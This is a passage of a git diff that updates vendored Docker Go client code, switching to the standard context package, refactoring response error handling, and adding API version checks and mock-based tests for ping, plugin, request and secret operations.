serverResp.header.Get("OSType") } - - return ping, nil + return ping, cli.checkResponseErr(serverResp) } diff --git a/vendor/github.com/docker/docker/client/ping_test.go b/vendor/github.com/docker/docker/client/ping_test.go new file mode 100644 index 0000000000..10bbbe811d --- /dev/null +++ b/vendor/github.com/docker/docker/client/ping_test.go @@ -0,0 +1,83 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "errors" + "io/ioutil" + "net/http" + "strings" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// TestPingFail tests that when a server sends a non-successful response that we +// can still grab API details, when set. +// Some of this is just exercising the code paths to make sure there are no +// panics. +func TestPingFail(t *testing.T) { + var withHeader bool + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + resp := &http.Response{StatusCode: http.StatusInternalServerError} + if withHeader { + resp.Header = http.Header{} + resp.Header.Set("API-Version", "awesome") + resp.Header.Set("Docker-Experimental", "true") + } + resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server")) + return resp, nil + }), + } + + ping, err := client.Ping(context.Background()) + assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(false, ping.Experimental)) + assert.Check(t, is.Equal("", ping.APIVersion)) + + withHeader = true + ping2, err := client.Ping(context.Background()) + assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(true, ping2.Experimental)) + assert.Check(t, is.Equal("awesome", ping2.APIVersion)) +} + +// TestPingWithError tests the case where there is a protocol error in the ping. +// This test is mostly just testing that there are no panics in this code path. 
+func TestPingWithError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + resp := &http.Response{StatusCode: http.StatusInternalServerError} + resp.Header = http.Header{} + resp.Header.Set("API-Version", "awesome") + resp.Header.Set("Docker-Experimental", "true") + resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server")) + return resp, errors.New("some error") + }), + } + + ping, err := client.Ping(context.Background()) + assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(false, ping.Experimental)) + assert.Check(t, is.Equal("", ping.APIVersion)) +} + +// TestPingSuccess tests that we are able to get the expected API headers/ping +// details on success. +func TestPingSuccess(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + resp := &http.Response{StatusCode: http.StatusInternalServerError} + resp.Header = http.Header{} + resp.Header.Set("API-Version", "awesome") + resp.Header.Set("Docker-Experimental", "true") + resp.Body = ioutil.NopCloser(strings.NewReader("some error with the server")) + return resp, nil + }), + } + ping, err := client.Ping(context.Background()) + assert.Check(t, is.ErrorContains(err, "")) + assert.Check(t, is.Equal(true, ping.Experimental)) + assert.Check(t, is.Equal("awesome", ping.APIVersion)) +} diff --git a/vendor/github.com/docker/docker/client/plugin_create.go b/vendor/github.com/docker/docker/client/plugin_create.go index a660ba5733..4591db50fd 100644 --- a/vendor/github.com/docker/docker/client/plugin_create.go +++ b/vendor/github.com/docker/docker/client/plugin_create.go @@ -1,18 +1,18 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/http" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginCreate creates a plugin func (cli *Client) PluginCreate(ctx context.Context, 
createContext io.Reader, createOptions types.PluginCreateOptions) error { headers := http.Header(make(map[string][]string)) - headers.Set("Content-Type", "application/tar") + headers.Set("Content-Type", "application/x-tar") query := url.Values{} query.Set("name", createOptions.RepoName) diff --git a/vendor/github.com/docker/docker/client/plugin_disable.go b/vendor/github.com/docker/docker/client/plugin_disable.go index 30467db742..01f6574f95 100644 --- a/vendor/github.com/docker/docker/client/plugin_disable.go +++ b/vendor/github.com/docker/docker/client/plugin_disable.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginDisable disables a plugin diff --git a/vendor/github.com/docker/docker/client/plugin_disable_test.go b/vendor/github.com/docker/docker/client/plugin_disable_test.go index a4de45be2d..ac2413d6c5 100644 --- a/vendor/github.com/docker/docker/client/plugin_disable_test.go +++ b/vendor/github.com/docker/docker/client/plugin_disable_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestPluginDisableError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_enable.go b/vendor/github.com/docker/docker/client/plugin_enable.go index 95517c4b80..736da48bd1 100644 --- a/vendor/github.com/docker/docker/client/plugin_enable.go +++ b/vendor/github.com/docker/docker/client/plugin_enable.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginEnable enables a plugin diff --git 
a/vendor/github.com/docker/docker/client/plugin_enable_test.go b/vendor/github.com/docker/docker/client/plugin_enable_test.go index b27681348f..911ccaf1e9 100644 --- a/vendor/github.com/docker/docker/client/plugin_enable_test.go +++ b/vendor/github.com/docker/docker/client/plugin_enable_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestPluginEnableError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_inspect.go b/vendor/github.com/docker/docker/client/plugin_inspect.go index 89f39ee2c6..0ab7beaee8 100644 --- a/vendor/github.com/docker/docker/client/plugin_inspect.go +++ b/vendor/github.com/docker/docker/client/plugin_inspect.go @@ -1,23 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginInspectWithRaw inspects an existing plugin func (cli *Client) PluginInspectWithRaw(ctx context.Context, name string) (*types.Plugin, []byte, error) { + if name == "" { + return nil, nil, objectNotFoundError{object: "plugin", id: name} + } resp, err := cli.get(ctx, "/plugins/"+name+"/json", nil, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return nil, nil, pluginNotFoundError{name} - } - return nil, nil, err + return nil, nil, wrapResponseError(err, resp, "plugin", name) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/plugin_inspect_test.go b/vendor/github.com/docker/docker/client/plugin_inspect_test.go index fae407eb9b..74ca0f0fc0 100644 --- a/vendor/github.com/docker/docker/client/plugin_inspect_test.go +++ b/vendor/github.com/docker/docker/client/plugin_inspect_test.go @@ -1,7 +1,8 @@ -package client 
+package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestPluginInspectError(t *testing.T) { @@ -24,6 +25,18 @@ func TestPluginInspectError(t *testing.T) { } } +func TestPluginInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.PluginInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestPluginInspect(t *testing.T) { expectedURL := "/plugins/plugin_name" client := &Client{ diff --git a/vendor/github.com/docker/docker/client/plugin_install.go b/vendor/github.com/docker/docker/client/plugin_install.go index 3217c4cf39..13baa40a9b 100644 --- a/vendor/github.com/docker/docker/client/plugin_install.go +++ b/vendor/github.com/docker/docker/client/plugin_install.go @@ -1,6 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "io" "net/http" @@ -9,13 +10,12 @@ import ( "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/pkg/errors" - "golang.org/x/net/context" ) // PluginInstall installs a plugin func (cli *Client) PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { query := url.Values{} - if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + if _, err := reference.ParseNormalizedNamed(options.RemoteRef); err != nil { return nil, errors.Wrap(err, "invalid remote reference") } query.Set("remote", options.RemoteRef) @@ -60,8 +60,8 @@ func (cli *Client) PluginInstall(ctx context.Context, name string, options types return } - err = cli.PluginEnable(ctx, 
name, types.PluginEnableOptions{Timeout: 0}) - pw.CloseWithError(err) + enableErr := cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0}) + pw.CloseWithError(enableErr) }() return pr, nil } diff --git a/vendor/github.com/docker/docker/client/plugin_list.go b/vendor/github.com/docker/docker/client/plugin_list.go index 88c480a3e1..ade1051a97 100644 --- a/vendor/github.com/docker/docker/client/plugin_list.go +++ b/vendor/github.com/docker/docker/client/plugin_list.go @@ -1,18 +1,29 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" + "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/filters" ) // PluginList returns the installed plugins -func (cli *Client) PluginList(ctx context.Context) (types.PluginsListResponse, error) { +func (cli *Client) PluginList(ctx context.Context, filter filters.Args) (types.PluginsListResponse, error) { var plugins types.PluginsListResponse - resp, err := cli.get(ctx, "/plugins", nil, nil) + query := url.Values{} + + if filter.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, filter) + if err != nil { + return plugins, err + } + query.Set("filters", filterJSON) + } + resp, err := cli.get(ctx, "/plugins", query, nil) if err != nil { - return plugins, err + return plugins, wrapResponseError(err, resp, "plugin", "") } err = json.NewDecoder(resp.body).Decode(&plugins) diff --git a/vendor/github.com/docker/docker/client/plugin_list_test.go b/vendor/github.com/docker/docker/client/plugin_list_test.go index 173e4b87f5..7dc351dceb 100644 --- a/vendor/github.com/docker/docker/client/plugin_list_test.go +++ b/vendor/github.com/docker/docker/client/plugin_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" 
"github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/filters" ) func TestPluginListError(t *testing.T) { @@ -18,7 +19,7 @@ func TestPluginListError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, err := client.PluginList(context.Background()) + _, err := client.PluginList(context.Background(), filters.NewArgs()) if err == nil || err.Error() != "Error response from daemon: Server error" { t.Fatalf("expected a Server Error, got %v", err) } @@ -26,34 +27,81 @@ func TestPluginListError(t *testing.T) { func TestPluginList(t *testing.T) { expectedURL := "/plugins" - client := &Client{ - client: newMockClient(func(req *http.Request) (*http.Response, error) { - if !strings.HasPrefix(req.URL.Path, expectedURL) { - return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) - } - content, err := json.Marshal([]*types.Plugin{ - { - ID: "plugin_id1", - }, - { - ID: "plugin_id2", - }, - }) - if err != nil { - return nil, err - } - return &http.Response{ - StatusCode: http.StatusOK, - Body: ioutil.NopCloser(bytes.NewReader(content)), - }, nil - }), - } - plugins, err := client.PluginList(context.Background()) - if err != nil { - t.Fatal(err) + enabledFilters := filters.NewArgs() + enabledFilters.Add("enabled", "true") + + capabilityFilters := filters.NewArgs() + capabilityFilters.Add("capability", "volumedriver") + capabilityFilters.Add("capability", "authz") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.NewArgs(), + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": "", + }, + }, + { + filters: enabledFilters, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": `{"enabled":{"true":true}}`, + }, + }, + { + filters: capabilityFilters, + expectedQueryParams: map[string]string{ + "all": "", + "filter": "", + "filters": 
`{"capability":{"authz":true,"volumedriver":true}}`, + }, + }, } - if len(plugins) != 2 { - t.Fatalf("expected 2 plugins, got %v", plugins) + + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]*types.Plugin{ + { + ID: "plugin_id1", + }, + { + ID: "plugin_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + plugins, err := client.PluginList(context.Background(), listCase.filters) + if err != nil { + t.Fatal(err) + } + if len(plugins) != 2 { + t.Fatalf("expected 2 plugins, got %v", plugins) + } } } diff --git a/vendor/github.com/docker/docker/client/plugin_push.go b/vendor/github.com/docker/docker/client/plugin_push.go index 1e5f963251..d20bfe8447 100644 --- a/vendor/github.com/docker/docker/client/plugin_push.go +++ b/vendor/github.com/docker/docker/client/plugin_push.go @@ -1,9 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" - - "golang.org/x/net/context" ) // PluginPush pushes a plugin to a registry diff --git a/vendor/github.com/docker/docker/client/plugin_push_test.go b/vendor/github.com/docker/docker/client/plugin_push_test.go index d9f70cdff8..20b23a1173 100644 --- a/vendor/github.com/docker/docker/client/plugin_push_test.go +++ b/vendor/github.com/docker/docker/client/plugin_push_test.go @@ -1,14 +1,13 @@ -package client +package client // import 
"github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestPluginPushError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_remove.go b/vendor/github.com/docker/docker/client/plugin_remove.go index b017e4d348..8563bab0db 100644 --- a/vendor/github.com/docker/docker/client/plugin_remove.go +++ b/vendor/github.com/docker/docker/client/plugin_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // PluginRemove removes a plugin @@ -16,5 +16,5 @@ func (cli *Client) PluginRemove(ctx context.Context, name string, options types. resp, err := cli.delete(ctx, "/plugins/"+name, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "plugin", name) } diff --git a/vendor/github.com/docker/docker/client/plugin_remove_test.go b/vendor/github.com/docker/docker/client/plugin_remove_test.go index a15f1661f6..e6c76342ee 100644 --- a/vendor/github.com/docker/docker/client/plugin_remove_test.go +++ b/vendor/github.com/docker/docker/client/plugin_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,8 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" ) func TestPluginRemoveError(t *testing.T) { @@ -33,7 +32,7 @@ func TestPluginRemove(t *testing.T) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) } if req.Method != "DELETE" { - return nil, fmt.Errorf("expected POST method, got %s", req.Method) + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) } return &http.Response{ StatusCode: http.StatusOK, diff --git a/vendor/github.com/docker/docker/client/plugin_set.go 
b/vendor/github.com/docker/docker/client/plugin_set.go index 3260d2a90d..dcf5752ca2 100644 --- a/vendor/github.com/docker/docker/client/plugin_set.go +++ b/vendor/github.com/docker/docker/client/plugin_set.go @@ -1,7 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "golang.org/x/net/context" + "context" ) // PluginSet modifies settings for an existing plugin diff --git a/vendor/github.com/docker/docker/client/plugin_set_test.go b/vendor/github.com/docker/docker/client/plugin_set_test.go index 2450254463..2e97904b86 100644 --- a/vendor/github.com/docker/docker/client/plugin_set_test.go +++ b/vendor/github.com/docker/docker/client/plugin_set_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestPluginSetError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/plugin_upgrade.go b/vendor/github.com/docker/docker/client/plugin_upgrade.go index 95a4356b97..115cea945b 100644 --- a/vendor/github.com/docker/docker/client/plugin_upgrade.go +++ b/vendor/github.com/docker/docker/client/plugin_upgrade.go @@ -1,20 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "fmt" + "context" "io" "net/url" "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/pkg/errors" - "golang.org/x/net/context" ) // PluginUpgrade upgrades a plugin func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) { + if err := cli.NewVersionError("1.26", "plugin upgrade"); err != nil { + return nil, err + } query := url.Values{} - if _, err := reference.ParseNamed(options.RemoteRef); err != nil { + if _, err := reference.ParseNormalizedNamed(options.RemoteRef); err != nil { return nil, errors.Wrap(err, "invalid remote 
reference") } query.Set("remote", options.RemoteRef) @@ -33,5 +35,5 @@ func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types func (cli *Client) tryPluginUpgrade(ctx context.Context, query url.Values, privileges types.PluginPrivileges, name, registryAuth string) (serverResponse, error) { headers := map[string][]string{"X-Registry-Auth": {registryAuth}} - return cli.post(ctx, fmt.Sprintf("/plugins/%s/upgrade", name), query, privileges, headers) + return cli.post(ctx, "/plugins/"+name+"/upgrade", query, privileges, headers) } diff --git a/vendor/github.com/docker/docker/client/request.go b/vendor/github.com/docker/docker/client/request.go index ac05363655..a19d62aa52 100644 --- a/vendor/github.com/docker/docker/client/request.go +++ b/vendor/github.com/docker/docker/client/request.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io" @@ -15,7 +16,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/versions" "github.com/pkg/errors" - "golang.org/x/net/context" "golang.org/x/net/context/ctxhttp" ) @@ -24,6 +24,7 @@ type serverResponse struct { body io.ReadCloser header http.Header statusCode int + reqURL *url.URL } // head sends an http request to the docker API using the method HEAD. @@ -31,12 +32,12 @@ func (cli *Client) head(ctx context.Context, path string, query url.Values, head return cli.sendRequest(ctx, "HEAD", path, query, nil, headers) } -// getWithContext sends an http request to the docker API using the method GET with a specific go context. +// get sends an http request to the docker API using the method GET with a specific Go context. 
func (cli *Client) get(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) { return cli.sendRequest(ctx, "GET", path, query, nil, headers) } -// postWithContext sends an http request to the docker API using the method POST with a specific go context. +// post sends an http request to the docker API using the method POST with a specific Go context. func (cli *Client) post(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) { body, headers, err := encodeBody(obj, headers) if err != nil { @@ -58,7 +59,7 @@ func (cli *Client) put(ctx context.Context, path string, query url.Values, obj i return cli.sendRequest(ctx, "PUT", path, query, body, headers) } -// put sends an http request to the docker API using the method PUT. +// putRaw sends an http request to the docker API using the method PUT. func (cli *Client) putRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) { return cli.sendRequest(ctx, "PUT", path, query, body, headers) } @@ -118,11 +119,15 @@ func (cli *Client) sendRequest(ctx context.Context, method, path string, query u if err != nil { return serverResponse{}, err } - return cli.doRequest(ctx, req) + resp, err := cli.doRequest(ctx, req) + if err != nil { + return resp, err + } + return resp, cli.checkResponseErr(resp) } func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResponse, error) { - serverResp := serverResponse{statusCode: -1} + serverResp := serverResponse{statusCode: -1, reqURL: req.URL} resp, err := ctxhttp.Do(ctx, cli.client, req) if err != nil { @@ -165,7 +170,7 @@ func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResp // daemon on Windows where the daemon is listening on a named pipe // `//./pipe/docker_engine, and the client must be running elevated. 
// Give users a clue rather than the not-overly useful message - // such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.25/info: + // such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.26/info: // open //./pipe/docker_engine: The system cannot find the file specified.`. // Note we can't string compare "The system cannot find the file specified" as // this is localised - for example in French the error would be @@ -179,35 +184,42 @@ func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResp if resp != nil { serverResp.statusCode = resp.StatusCode + serverResp.body = resp.Body + serverResp.header = resp.Header } + return serverResp, nil +} - if serverResp.statusCode < 200 || serverResp.statusCode >= 400 { - body, err := ioutil.ReadAll(resp.Body) - if err != nil { - return serverResp, err - } - if len(body) == 0 { - return serverResp, fmt.Errorf("Error: request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), req.URL) - } +func (cli *Client) checkResponseErr(serverResp serverResponse) error { + if serverResp.statusCode >= 200 && serverResp.statusCode < 400 { + return nil + } - var errorMessage string - if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) && - resp.Header.Get("Content-Type") == "application/json" { - var errorResponse types.ErrorResponse - if err := json.Unmarshal(body, &errorResponse); err != nil { - return serverResp, fmt.Errorf("Error reading JSON: %v", err) - } - errorMessage = errorResponse.Message - } else { - errorMessage = string(body) - } + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return err + } + if len(body) == 0 { + return fmt.Errorf("request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), serverResp.reqURL) + } - return serverResp, fmt.Errorf("Error 
response from daemon: %s", strings.TrimSpace(errorMessage)) + var ct string + if serverResp.header != nil { + ct = serverResp.header.Get("Content-Type") } - serverResp.body = resp.Body - serverResp.header = resp.Header - return serverResp, nil + var errorMessage string + if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) && ct == "application/json" { + var errorResponse types.ErrorResponse + if err := json.Unmarshal(body, &errorResponse); err != nil { + return fmt.Errorf("Error reading JSON: %v", err) + } + errorMessage = errorResponse.Message + } else { + errorMessage = string(body) + } + + return fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage)) } func (cli *Client) addHeaders(req *http.Request, headers headers) *http.Request { @@ -239,9 +251,9 @@ func encodeData(data interface{}) (*bytes.Buffer, error) { } func ensureReaderClosed(response serverResponse) { - if body := response.body; body != nil { + if response.body != nil { // Drain up to 512 bytes and close the body to let the Transport reuse the connection - io.CopyN(ioutil.Discard, body, 512) + io.CopyN(ioutil.Discard, response.body, 512) response.body.Close() } } diff --git a/vendor/github.com/docker/docker/client/request_test.go b/vendor/github.com/docker/docker/client/request_test.go index 63908aec4b..fda4d88aa1 100644 --- a/vendor/github.com/docker/docker/client/request_test.go +++ b/vendor/github.com/docker/docker/client/request_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" ) // TestSetHostHeader should set fake host for local communications, set real host @@ -44,10 +45,8 @@ func TestSetHostHeader(t *testing.T) { } for c, test := range testCases { - proto, addr, basePath, err := ParseHost(test.host) - if err != nil { - 
t.Fatal(err) - } + hostURL, err := ParseHostURL(test.host) + assert.NilError(t, err) client := &Client{ client: newMockClient(func(req *http.Request) (*http.Response, error) { @@ -62,19 +61,17 @@ func TestSetHostHeader(t *testing.T) { } return &http.Response{ StatusCode: http.StatusOK, - Body: ioutil.NopCloser(bytes.NewReader(([]byte("")))), + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), }, nil }), - proto: proto, - addr: addr, - basePath: basePath, + proto: hostURL.Scheme, + addr: hostURL.Host, + basePath: hostURL.Path, } _, err = client.sendRequest(context.Background(), "GET", testURL, nil, nil, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) } } diff --git a/vendor/github.com/docker/docker/client/secret_create.go b/vendor/github.com/docker/docker/client/secret_create.go index de8b041567..09fae82f2a 100644 --- a/vendor/github.com/docker/docker/client/secret_create.go +++ b/vendor/github.com/docker/docker/client/secret_create.go @@ -1,19 +1,20 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // SecretCreate creates a new Secret. 
func (cli *Client) SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) { - var headers map[string][]string - var response types.SecretCreateResponse - resp, err := cli.post(ctx, "/secrets/create", nil, secret, headers) + if err := cli.NewVersionError("1.25", "secret create"); err != nil { + return response, err + } + resp, err := cli.post(ctx, "/secrets/create", nil, secret, nil) if err != nil { return response, err } diff --git a/vendor/github.com/docker/docker/client/secret_create_test.go b/vendor/github.com/docker/docker/client/secret_create_test.go index cb378c77ff..419bdbcbc6 100644 --- a/vendor/github.com/docker/docker/client/secret_create_test.go +++ b/vendor/github.com/docker/docker/client/secret_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,12 +12,23 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretCreateUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + _, err := client.SecretCreate(context.Background(), swarm.SecretSpec{}) + assert.Check(t, is.Error(err, `"secret create" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretCreateError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.SecretCreate(context.Background(), swarm.SecretSpec{}) if err == nil || err.Error() != "Error response from daemon: Server error" { @@ -25,8 +37,9 @@ func TestSecretCreateError(t *testing.T) { } func TestSecretCreate(t *testing.T) { - expectedURL := "/secrets/create" + expectedURL := 
"/v1.25/secrets/create" client := &Client{ + version: "1.25", client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) diff --git a/vendor/github.com/docker/docker/client/secret_inspect.go b/vendor/github.com/docker/docker/client/secret_inspect.go index f774576118..e8322f4589 100644 --- a/vendor/github.com/docker/docker/client/secret_inspect.go +++ b/vendor/github.com/docker/docker/client/secret_inspect.go @@ -1,23 +1,25 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // SecretInspectWithRaw returns the secret information with raw data func (cli *Client) SecretInspectWithRaw(ctx context.Context, id string) (swarm.Secret, []byte, error) { + if err := cli.NewVersionError("1.25", "secret inspect"); err != nil { + return swarm.Secret{}, nil, err + } + if id == "" { + return swarm.Secret{}, nil, objectNotFoundError{object: "secret", id: id} + } resp, err := cli.get(ctx, "/secrets/"+id, nil, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return swarm.Secret{}, nil, secretNotFoundError{id} - } - return swarm.Secret{}, nil, err + return swarm.Secret{}, nil, wrapResponseError(err, resp, "secret", id) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/secret_inspect_test.go b/vendor/github.com/docker/docker/client/secret_inspect_test.go index 423d986968..6c84799b17 100644 --- a/vendor/github.com/docker/docker/client/secret_inspect_test.go +++ b/vendor/github.com/docker/docker/client/secret_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,12 +11,24 @@ import ( "testing" 
"github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestSecretInspectUnsupported(t *testing.T) { + client := &Client{ + version: "1.24", + client: &http.Client{}, + } + _, _, err := client.SecretInspectWithRaw(context.Background(), "nothing") + assert.Check(t, is.Error(err, `"secret inspect" requires API version 1.25, but the Docker daemon API version is 1.24`)) +} + func TestSecretInspectError(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, _, err := client.SecretInspectWithRaw(context.Background(), "nothing") @@ -26,18 +39,32 @@ func TestSecretInspectError(t *testing.T) { func TestSecretInspectSecretNotFound(t *testing.T) { client := &Client{ - client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + version: "1.25", + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), } _, _, err := client.SecretInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrSecretNotFound(err) { - t.Fatalf("expected an secretNotFoundError error, got %v", err) + if err == nil || !IsErrNotFound(err) { + t.Fatalf("expected a secretNotFoundError error, got %v", err) + } +} + +func TestSecretInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.SecretInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } func TestSecretInspect(t *testing.T) { - expectedURL := "/secrets/secret_id" + expectedURL := 